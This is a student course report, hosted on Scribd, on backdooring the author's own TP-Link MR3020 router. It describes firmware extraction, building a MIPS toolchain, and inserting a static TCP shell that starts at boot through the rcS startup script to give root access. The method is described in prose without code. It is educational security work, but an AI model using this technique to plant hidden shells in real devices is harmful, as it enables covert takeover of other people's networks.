Scribd
Upload
10 views

Backdooring A Router

Uploaded by

Pieter Veenders
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
10 views

Backdooring A Router

Uploaded by

Pieter Veenders
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

ITKST6400 - Miniproject - Backdooring a

TP-Link MR3020 router

Arttu Ylä-Sahra

17. joulukuuta 2018

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Introduction

1.1 What’s this?


This document is the documentation for the ITKST6400 course mini-project.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Background

In this project, I will be backdooring a device I own, a basic TP-Link


MR3020 wireless router. This unit has been unused for years, and hasn’t
served much useful purpose - until now.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


This project is very much inspired by work of Osanda Malith, in particu-
lar his blogpost How to Turn Your Switch into a Snitch, and walks through
the steps of executing a similar action. Also, (semi-seriously speaking), all IT
security enthusiasts should own at least one device which they have perso-

Arttu Ylä-Sahra, eearyla@student.jyu.fi


nally backdoored - creating and using such a device is indeed an educational
experience.
Original plan was to look for exploits - but as it stands, turns out the
version I had was different that I thought it was, and the bottom fell off from
that idea. However, I thought, why not make my own..
For this task, a freshy installed and upgraded Kali Linux 2018 instance
will be used. This file documents the steps taken to create a backdoored but
otherwise fully functional router.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Determining the appropriate firmware version

The first step is determining the appropriate version to start with. As far
as I know, TP-Link devices have differences across regions, and it cannot be
said for sure what is appropriate for a given device without inspecting the
device itself.
This is accomplished by connecting the device to a special test setup, as
seen here. Personal networking configuration allows me to provide the rou-
ter with an isolated access, so that it cannot connect to the ”secure”/LAN
network out of the IoT/”Proxmox”network. It does provide an Internet con-
nection though, so it can be easily used for practical testing.
Ensuring the router is in 3G/4G mode, which makes it operate as a NATing
router, I log in using the default credentials (having factory reset the router
beforehand), and find the correct version details quickly.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Hmm.. 3.17.2 Build 140610 Rel 65031n, HW version MR3020 V1
00000000. More precisely, looking from the device itself, V1.9 Seems like we
now know what we are looking for. Let’s next get started with Firmware Mod
Kit. Let’s take the latest available version, TL-MR3020_V1_150921.
One has to be careful here - there are multiple hardware versions
in existence, and my particular unit is one of the older ones!

Arttu Ylä-Sahra, eearyla@student.jyu.fi


7

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Uncapping firmware

A few moments later, and..

The firmware seems to have gotten appropriately extracted; the extracted


FW files and original file are included in the ZIP file for inspection.
So, we need a MIPS cross-compiler Additional research from OpenWRT
(https://openwrt.org/toh/hwdata/tp-link/tp-link_tl-mr3020_v1) in-
dicates the correct MIPS architecture is 24kc, the CPU being Atheros
AR9331.
Let’s get a http://buildroot.org toolchain, as we need to compile
an user-mode application. https://wikidevi.com/wiki/MIPS_24K indica-
tes that the appropriate Buildtools architecture selection is MIPS32R2, in
a big-endian format. This confirms that what the file command told us, is
infact entirely correct.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Configuring using make menuconfig and then make toolchain, we now
have a valid, working toolchain. I also had to select 2.6.31 as the kernel
version to ensure programs will build appropriately.
Building a toolchain took an extraordinarily, if not an excessively long
time, apparently because it had to complete a significant amount of configu-
ration and compiling work. And it still failed the first time

I do not have the time or patience to start diagnosing uclibc issues. Let’s
try musl instead.

YES! This looks more like it. Let’s add that to the path.. and compile a
little test program

Good. This proves our compiler works - although, we will need to use a
statically compiled program as in the blogpost, due to the fact that MR3020
uses ulibc, and we use musl. These are almost certainly not binary compatible
with each other, so we need a program that runs independently without
reliance on system libc. My MIPS assembly skills are very weak, so we must
accept the trade-off of larger program size for now.

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Backdooring the firmware

Due to, again, time constraints (I’m overdue for a vacation!), we are going
to settle for a simple TCP shell. Not the most refined method, but highly
effective in allowing further tampering. The full source of this shell (including
appropriate credits) will be included in the attached ZIP file.
After some hour of bodging, I have a functional TCP shell

And with a few more commands, also neatly cross-compiled in a way that
it does not depend on any dynamic libraries, stripped to reduce space needs

To insert this backdoor, we will copy it into /bin/mips_shell, and insert


our command into /etc/rc.d/rcS, right after the HTTP daemon starts.

10

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Right, we have now rebuilt our firmware..

11

Arttu Ylä-Sahra, eearyla@student.jyu.fi


Hmm.. this is clever. Due to the network configuration, I had to enable
remote management.. but turns out, logging in remotely blocks firmware
upgrade attempts. Oh well, let’s use the mobile phone to upgrade. A (slightly
nervous, as with all firmware upgrades) reboot later, and...
Success! Well, almost, the terminal crashed almost immediately for some
unknown reason.
It also turns out, TP-Link had some good design sense; apparently, even
after disabling the router firewall, it would NOT let me connect to the ex-
pected port from the WAN by default. Well, that could perhaps be fixed by
a firewall setting change, although strangely enough, disabling the firewall
or creating a port forward did not apparently permit connection. Perhaps it
would have needed a restart?

12

Arttu Ylä-Sahra, eearyla@student.jyu.fi


13

Arttu Ylä-Sahra, eearyla@student.jyu.fi


It seems also that the initial shell is fragile in some yet unknown way... a
problem that is more or less easily solved by opening a second sh

Nevertheless, we now have working root access at our disposal. And this
is one of the most dangerous tools a hacker can have in case of an embedded
device. Our job is done.
That’s about it. Last step is appropriately marking the state of the router,
so that it won’t accidentally get mixed up with benign devices.

14

Arttu Ylä-Sahra, eearyla@student.jyu.fi


15

Arttu Ylä-Sahra, eearyla@student.jyu.fi

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy